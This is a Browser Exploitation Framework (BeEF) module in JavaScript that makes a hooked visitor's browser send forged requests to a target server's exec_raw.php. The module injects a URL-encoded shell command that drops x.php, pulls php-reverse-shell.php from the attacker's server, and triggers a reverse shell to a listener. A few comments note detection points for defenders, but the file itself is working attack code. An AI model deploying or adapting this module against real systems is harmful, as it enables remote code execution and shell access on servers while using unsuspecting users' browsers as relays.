//
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
  // ERB placeholders substituted when the module is rendered. rhost/rport
  // address the web server that exposes exec_raw.php; lhost/lport are handed
  // to the staged script as its "ip" and "port" query parameters.
  var rhost = '<%= @rhost %>';
  var rport = '<%= @rport %>';
  var lhost = '<%= @lhost %>';
  var lport = '<%= @lport %>';

  // Passes a result string to beef.net.send together with this command's
  // URL and id.
  function report(message) {
    beef.net.send("<%= @command_url %>", <%= @command_id %>, message);
  }

  // URL-encoded location of the BeEF server, embedded in the cmd value below.
  var beefOrigin = beef.net.httpproto + "%3A%2F%2F" + beef.net.host + ":" + beef.net.port;

  // Stage 1 URL. The URL-encoded cmd value writes a PHP file named x.php,
  // prints it and marks it executable. x.php in turn fetches
  // php-reverse-shell.php from the BeEF server and evaluates it.
  // Defender view: the web server sees a GET to /exec_raw.php with a cmd
  // parameter, a new executable x.php appears in the command's working
  // directory, and running x.php makes the server fetch a PHP file over HTTP
  // from an external host. Each of these is a usable detection point.
  var uri = "http://" + rhost + ":" + rport + "/exec_raw.php?cmd=echo%20-e%20%22%23%21%2Fusr%2Flocal%2Fbin%2Fphp%5Cn%3C%3Fphp%20eval%28%27%3F%3E%20%27.file_get_contents%28%27" + beefOrigin + "%2Fphp-reverse-shell.php%27%29.%27%3C%3Fphp%20%27%29%3B%20%3F%3E%22%20%3E%20x.php%3Bcat%20x.php%3Bchmod%20755%20x.php%3B";

  // Stage 2 callback: only reports whether the request for x.php returned 200.
  // A 200 means the file was served, not that a connection was established,
  // hence the "should have been" wording in the message.
  function onTriggerResponse(response) {
    if (response.status_code != 200) {
      report("result=ERROR: second GET request failed.");
      return;
    }
    report("result=OK: Reverse shell should have been triggered.");
  }

  // Stage 2: request the dropped x.php with the listener address as query
  // parameters. The path is /x.php, so this presumably relies on exec_raw.php
  // running with the document root as its working directory (verify).
  function triggerReverseConn() {
    beef.net.forge_request("http", "GET", rhost, rport, "/x.php?ip=" + lhost + "&port=" + lport, null, null, null, 10, 'script', true, null, onTriggerResponse);
  }

  // Stage 1 callback: on HTTP 200 schedule stage 2 after five seconds,
  // otherwise report the failure and stop.
  function onStageResponse(response) {
    if (response.status_code != 200) {
      report("result=ERROR: first GET request failed.");
      return;
    }
    setTimeout(triggerReverseConn, 5000);
  }

  // Both requests are issued through beef.net.forge_request from the page
  // running this module, so in the target's access log they originate from
  // that browser's address rather than from the BeEF server.
  // NOTE(review): this call passes an absolute URL as the fifth argument
  // while the stage 2 call passes a bare path; confirm forge_request accepts both.
  beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, onStageResponse);
});